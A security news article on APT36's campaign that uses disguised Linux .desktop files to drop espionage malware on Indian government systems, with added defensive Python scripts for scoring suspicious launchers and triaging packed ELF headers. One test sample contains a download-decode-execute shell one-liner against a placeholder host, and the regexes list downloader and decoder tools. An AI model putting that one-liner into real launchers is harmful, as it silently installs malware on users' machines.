
Pakistan-linked APT36 abuses Linux .desktop files to drop custom malware in new campaign


APT36 uses Linux .desktop files in new attacks on Indian gov & defense, aiming for data theft and persistent espionage access.

Transparent Tribe (aka APT36, Operation C-Major, and Mythic Leopard), a Pakistan-linked threat actor, is using Linux .desktop files to load malware in new attacks against government and defense entities in India.

The APT group is targeting Indian government entities via spear-phishing emails deploying custom malware for persistent espionage.

APT36’s latest campaign uses a malicious archive, “Meeting_Notice_Ltr_ID1543ops.pdf_.zip”, containing a disguised .desktop file that was flagged on VirusTotal.

The .desktop shortcut masquerades as a PDF but hides malicious commands in its Exec= line, which Bash runs when the entry is opened. The command downloads a hex-encoded payload from securestore[.]cv, decodes it and executes it silently, while opening a benign PDF in Firefox as a decoy. The entry carries a PDF icon, is set to run as an application (the Type=Application key), and is enabled for autostart, so the malware persists across logins and operates unnoticed.
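The traits described above (a document-style name and icon, a hidden shell one-liner that fetches and decodes a payload, a decoy PDF, autostart) can be scored mechanically from the launcher itself. The following script is an added example, not code from the CYFIRMA report or from the campaign: it parses the [Desktop Entry] group and applies the heuristics. The two entries it checks are constructed for this example; the domain payload.invalid is a placeholder rather than an indicator from the campaign, and the decoder tool (xxd) is an assumption, since the article states only that the payload is hex-encoded.

```python
"""Heuristic triage of Linux .desktop launchers that behave like droppers.

Added example, not the report's or the campaign's code. Parses the
[Desktop Entry] group of a .desktop file and scores the dropper traits
described in the article. Sample entries below are constructed.
"""
import re

# Regexes for the Exec= value. The tool names are assumptions about what a
# dropper one-liner typically uses (curl/wget to fetch, xxd -r -p or base64 -d
# to decode); the article says the payload is hex-encoded, not which tool.
SHELL_WRAPPER = re.compile(r'\b(?:ba|z|da)?sh\s+-c\b')
DOWNLOADER = re.compile(r'\b(?:curl|wget)\b')
DECODER = re.compile(r'\bxxd\s+-r\b|\bbase64\s+(?:-d|--decode)\b')
CHMOD_EXEC = re.compile(r'\bchmod\s+(?:\+x|[0-7]{3,4})\b')
DECOY_VIEWER = re.compile(r'\b(?:firefox|xdg-open|evince|okular)\b[^;&|]*\.pdf\b')
DOC_NAME = re.compile(r'\.(?:pdf|docx?|xlsx?|pptx?)$', re.IGNORECASE)
AUTOSTART_DIRS = ('/.config/autostart/', '/etc/xdg/autostart/')


def parse_desktop(text):
    """Return the key=value pairs of the [Desktop Entry] group as a dict.

    Other groups ([Desktop Action ...]), comments and blank lines are skipped;
    localized keys such as Name[de] are kept verbatim and simply not scored.
    """
    entry, in_main = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        if line.startswith('[') and line.endswith(']'):
            in_main = (line == '[Desktop Entry]')
            continue
        if in_main and '=' in line:
            key, _, value = line.partition('=')
            entry[key.strip()] = value.strip()
    return entry


def score_desktop(text, path=None):
    """Score a .desktop body; returns (score, reasons). Higher = more dropper-like.

    `path` is where the file was found (optional) and is used only to detect
    placement in an autostart directory. The weights are a judgement call
    for this example, not a published scheme.
    """
    entry = parse_desktop(text)
    exec_line = entry.get('Exec', '')
    name = entry.get('Name', '')
    icon = entry.get('Icon', '').lower()
    hidden_terminal = entry.get('Terminal', 'false').lower() == 'false'
    # X-GNOME-Autostart-enabled is the GNOME key; placement in an autostart
    # directory is the desktop-neutral way to achieve the same thing.
    autostart_key = entry.get('X-GNOME-Autostart-enabled', '').lower() == 'true'
    in_autostart_dir = bool(path) and any(d in path for d in AUTOSTART_DIRS)

    checks = [
        (SHELL_WRAPPER.search(exec_line), 2, 'Exec wraps a shell one-liner'),
        (DOWNLOADER.search(exec_line), 3, 'Exec fetches something from the network'),
        (DECODER.search(exec_line), 3, 'Exec decodes an encoded payload'),
        (CHMOD_EXEC.search(exec_line), 2, 'Exec marks a file executable'),
        (DECOY_VIEWER.search(exec_line), 2, 'Exec opens a PDF as a decoy'),
        (entry.get('Type') == 'Application' and DOC_NAME.search(name), 2,
         'Name looks like a document but Type=Application'),
        ('pdf' in icon or 'document' in icon, 1, 'Icon imitates a document'),
        (hidden_terminal and SHELL_WRAPPER.search(exec_line), 1,
         'shell runs with Terminal=false, so the user sees nothing'),
        (autostart_key or in_autostart_dir, 2, 'entry is set to autostart'),
    ]
    reasons = [why for hit, _, why in checks if hit]
    score = sum(weight for hit, weight, _ in checks if hit)
    return score, reasons


def is_suspicious(text, path=None, threshold=6):
    """Convenience wrapper: True when the score reaches the (assumed) threshold."""
    return score_desktop(text, path)[0] >= threshold


# Constructed sample modelled on the description above (placeholder domain).
SUSPECT_DESKTOP = """[Desktop Entry]
Type=Application
Name=Meeting_Notice_Ltr_ID1543ops.pdf
Icon=application-pdf
Terminal=false
X-GNOME-Autostart-enabled=true
Exec=bash -c "curl -s http://payload.invalid/s.hex -o /tmp/s.hex; xxd -r -p /tmp/s.hex > /tmp/s; chmod +x /tmp/s; /tmp/s & firefox /tmp/decoy.pdf"
"""

# Constructed benign launcher for comparison.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Icon=org.gnome.TextEditor
Exec=gnome-text-editor %U
Terminal=false
"""

if __name__ == '__main__':
    for label, body in (('suspect', SUSPECT_DESKTOP), ('benign', BENIGN_DESKTOP)):
        score, reasons = score_desktop(body)
        print(f'{label}: score={score} suspicious={is_suspicious(body)}')
        for reason in reasons:
            print('  -', reason)
```

Run it over `~/.config/autostart/*.desktop` and `~/.local/share/applications/*.desktop`, passing the path so the autostart check fires; a legitimate launcher rarely needs a shell wrapper, a downloader and a decoder in the same Exec= line, so the threshold can be kept low without much noise.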

The campaign was uncovered on August 1, 2025, and is still ongoing.

The analyzed file is a suspicious 64-bit ELF executable for x86-64, statically linked, with anomalies typical of packed malware: an implausibly large section header offset, missing section names, and irregular segments. It embeds the hardcoded C2 “modgovindia[.]space:4000” and ensures persistence through cron jobs and abuse of systemd services. On execution, it connects to the C2 using DNS queries and UDP sockets for stealthy communication, enabling data exfiltration and attacker control.
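The header anomalies listed above can be checked directly from the ELF64 file header and program header table. The following triage script is an added example, not the CYFIRMA analysis or any tooling from the report: it flags a section header table that lies beyond the end of the file, a missing section name table, and segments whose file range exceeds the file, and notes when no PT_INTERP or PT_DYNAMIC segment is present (statically linked). The actual sample is not available here, so both ELF blobs are constructed inside the script; the findings illustrate the checks, not the real binary.

```python
"""Sanity checks on an ELF64 header that surface the packing-style anomalies
described above. Added example; not the report's tooling. Both ELF blobs are
constructed below, so the findings illustrate the checks, not the real sample.
"""
import struct

EHDR = struct.Struct('<16sHHIQQQIHHHHHH')  # ELF64 little-endian file header (64 bytes)
PHDR = struct.Struct('<IIQQQQQQ')          # ELF64 program header (56 bytes)
PT_LOAD, PT_DYNAMIC, PT_INTERP = 1, 2, 3
ELFCLASS64, ELFDATA2LSB, SHN_UNDEF = 2, 1, 0


def triage_elf64(data):
    """Return a list of (code, detail) findings for a little-endian ELF64 blob.

    An empty list means the header and segment table are internally
    consistent; it does not mean the file is benign.
    """
    findings = []
    if len(data) < EHDR.size or data[:4] != b'\x7fELF':
        return [('BAD_MAGIC', 'not an ELF file')]
    (ident, _, _, _, _, e_phoff, e_shoff, _, _, e_phentsize, e_phnum,
     e_shentsize, e_shnum, e_shstrndx) = EHDR.unpack_from(data)
    if ident[4] != ELFCLASS64 or ident[5] != ELFDATA2LSB:
        return [('NOT_ELF64LE', 'only little-endian ELF64 is handled here')]
    size = len(data)

    # Section headers are not needed to execute, so packers routinely strip
    # or corrupt them; the loader never looks, but a triage script should.
    if e_shnum and e_shoff + e_shnum * e_shentsize > size:
        findings.append(('SHOFF_OOB', f'section header table at 0x{e_shoff:x} '
                         f'({e_shnum} entries) lies beyond file size {size}'))
    if e_shnum and (e_shstrndx == SHN_UNDEF or e_shstrndx >= e_shnum):
        findings.append(('SHSTRNDX_BAD', f'no usable section name table '
                         f'(e_shstrndx={e_shstrndx}, e_shnum={e_shnum})'))

    # Program headers are what the kernel actually maps, so check them harder.
    if e_phentsize < PHDR.size or e_phoff + e_phnum * e_phentsize > size:
        findings.append(('PHTAB_OOB', 'program header table unreadable or beyond file end'))
        return findings
    seen = set()
    for i in range(e_phnum):
        p_type, _, p_offset, _, _, p_filesz, p_memsz, _ = PHDR.unpack_from(
            data, e_phoff + i * e_phentsize)
        seen.add(p_type)
        if p_offset + p_filesz > size:
            findings.append(('SEG_OOB', f'segment {i} (type {p_type}) file range '
                             f'0x{p_offset:x}+0x{p_filesz:x} exceeds file size {size}'))
        if p_type == PT_LOAD and p_filesz > p_memsz:
            findings.append(('SEG_SIZE', f'segment {i}: p_filesz larger than p_memsz'))
    if PT_INTERP not in seen and PT_DYNAMIC not in seen:
        findings.append(('STATIC', 'no PT_INTERP/PT_DYNAMIC: statically linked'))
    return findings


def build_sample(shoff, shnum, shstrndx, phdrs, total_size):
    """Assemble a minimal ELF64 x86-64 blob: header, program headers, zero padding."""
    ident = b'\x7fELF' + bytes([ELFCLASS64, ELFDATA2LSB, 1, 0, 0]) + b'\x00' * 7
    hdr = EHDR.pack(ident, 2, 0x3E, 1, 0x401000, EHDR.size, shoff, 0,
                    EHDR.size, PHDR.size, len(phdrs), 64, shnum, shstrndx)
    body = b''.join(PHDR.pack(*p) for p in phdrs)
    return (hdr + body).ljust(total_size, b'\x00')


# Constructed: mimics a packed, static binary with the anomalies described above
# (section headers far past EOF, no name table, a segment larger than the file).
PACKED_SAMPLE = build_sample(
    shoff=0x7fffffff00, shnum=30, shstrndx=SHN_UNDEF,
    phdrs=[(PT_LOAD, 5, 0x0, 0x400000, 0x400000, 0x100000, 0x100000, 0x1000),
           (PT_LOAD, 6, 0x80, 0x600000, 0x600000, 0x40, 0x40, 0x1000)],
    total_size=256)

# Constructed: a consistent, dynamically linked layout for comparison.
CLEAN_SAMPLE = build_sample(
    shoff=0x180, shnum=3, shstrndx=2,
    phdrs=[(PT_INTERP, 4, 0xF0, 0x4000F0, 0x4000F0, 0x1C, 0x1C, 0x1),
           (PT_LOAD, 5, 0x0, 0x400000, 0x400000, 0x100, 0x100, 0x1000),
           (PT_DYNAMIC, 6, 0x100, 0x600100, 0x600100, 0x40, 0x40, 0x8)],
    total_size=0x180 + 3 * 64)

if __name__ == '__main__':
    for label, blob in (('packed', PACKED_SAMPLE), ('clean', CLEAN_SAMPLE)):
        print(label, 'findings:')
        for code, detail in triage_elf64(blob) or [('OK', 'no anomalies')]:
            print(f'  {code}: {detail}')
```

Feed a real file with `triage_elf64(open(path, 'rb').read())`; `readelf -h` will report the same out-of-range offsets, but a scripted check is easier to run over a whole quarantine directory.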

Transparent Tribe (also tracked as Operation C-Major, APT36, and Mythic Leopard) was first spotted by Proofpoint researchers in February 2016, in a series of cyber espionage operations against Indian diplomats and military personnel at embassies in Saudi Arabia and Kazakhstan. At the time, the researchers traced the source IP addresses to Pakistan. The attacks were part of a wider operation that relied on multiple vectors, such as watering-hole websites and phishing email campaigns, delivering custom RATs dubbed Crimson and Peppy. These RATs can exfiltrate information, take screenshots, and record webcam streams.

Transparent Tribe has been active since at least 2013 and has targeted entities across 27 countries, most of them in Afghanistan, Germany, India, Iran, and Pakistan.

“While Indian government entities remain the primary focus, APT36 has extended operations to adjacent sectors (education, research, and civil society), as well as opportunistic targeting in other geographies. This broad victimology increases the attack surface and introduces risk to partners, suppliers, and diplomatic missions abroad,” concludes the report published by CYFIRMA. “The adoption of .desktop payloads targeting Linux BOSS reflects a tactical shift toward exploiting indigenous technologies. Combined with traditional Windows-based malware and mobile implants, this shows the group’s intent to diversify access vectors and ensure persistence even in hardened environments.”


Pierluigi Paganini

(SecurityAffairs – hacking, APT36)